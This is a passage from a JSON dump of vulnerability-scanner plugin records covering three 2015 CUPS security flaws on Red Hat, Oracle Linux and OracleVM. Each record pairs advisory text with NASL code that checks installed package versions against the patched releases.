flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / 
cups-debuginfo / cups-devel / cups-filesystem / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:44:50", "description": "Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthis update, the cupsd daemon will be restarted automatically.", "edition": 30, "published": "2015-06-18T00:00:00", "title": "RHEL 6 / 7 : cups (RHSA-2015:1123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:cups-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cups-ipptool", "p-cpe:/a:redhat:enterprise_linux:cups-devel", "p-cpe:/a:redhat:enterprise_linux:cups", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:cups-libs", "p-cpe:/a:redhat:enterprise_linux:cups-filesystem", "cpe:/o:redhat:enterprise_linux:7.1", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:cups-client", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:cups-php", "p-cpe:/a:redhat:enterprise_linux:cups-lpd"], "id": "REDHAT-RHSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/nessus/84258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84258);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"RHEL 6 / 7 : cups (RHSA-2015:1123)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. 
An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-9679\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-ipptool\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1123\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-1.4.2-67.el6_6.1\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-debuginfo / cups-devel / cups-filesystem / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:57", "description": "From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. 
An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.", "edition": 25, "published": "2015-06-18T00:00:00", "title": "Oracle Linux 6 / 7 : cups (ELSA-2015-1123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:cups", "p-cpe:/a:oracle:linux:cups-filesystem", "p-cpe:/a:oracle:linux:cups-libs", "p-cpe:/a:oracle:linux:cups-php", "p-cpe:/a:oracle:linux:cups-devel", "p-cpe:/a:oracle:linux:cups-client", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:cups-lpd", "p-cpe:/a:oracle:linux:cups-ipptool"], "id": "ORACLELINUX_ELSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/nessus/84256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# Oracle Linux Security Advisory ELSA-2015-1123 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84256);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Oracle Linux 6 / 7 : cups (ELSA-2015-1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005129.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005130.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:33", "description": "The 
remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug\n #1229982).", "edition": 26, "published": "2015-06-18T00:00:00", "title": "OracleVM 3.3 : cups (OVMSA-2015-0071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:cups", "p-cpe:/a:oracle:vm:cups-libs"], "id": "ORACLEVM_OVMSA-2015-0071.NASL", "href": "https://www.tenable.com/plugins/nessus/84257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0071.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84257);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n\n script_name(english:\"OracleVM 3.3 : cups (OVMSA-2015-0071)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug\n #1229982).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-June/000319.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected cups / cups-libs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-libs\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:48:45", "description": "CUPS development team reports :\n\nThe new release addresses two security vulnerabilities, add\nlocalizations for German and Russian, and includes several general bug\nfixes. 
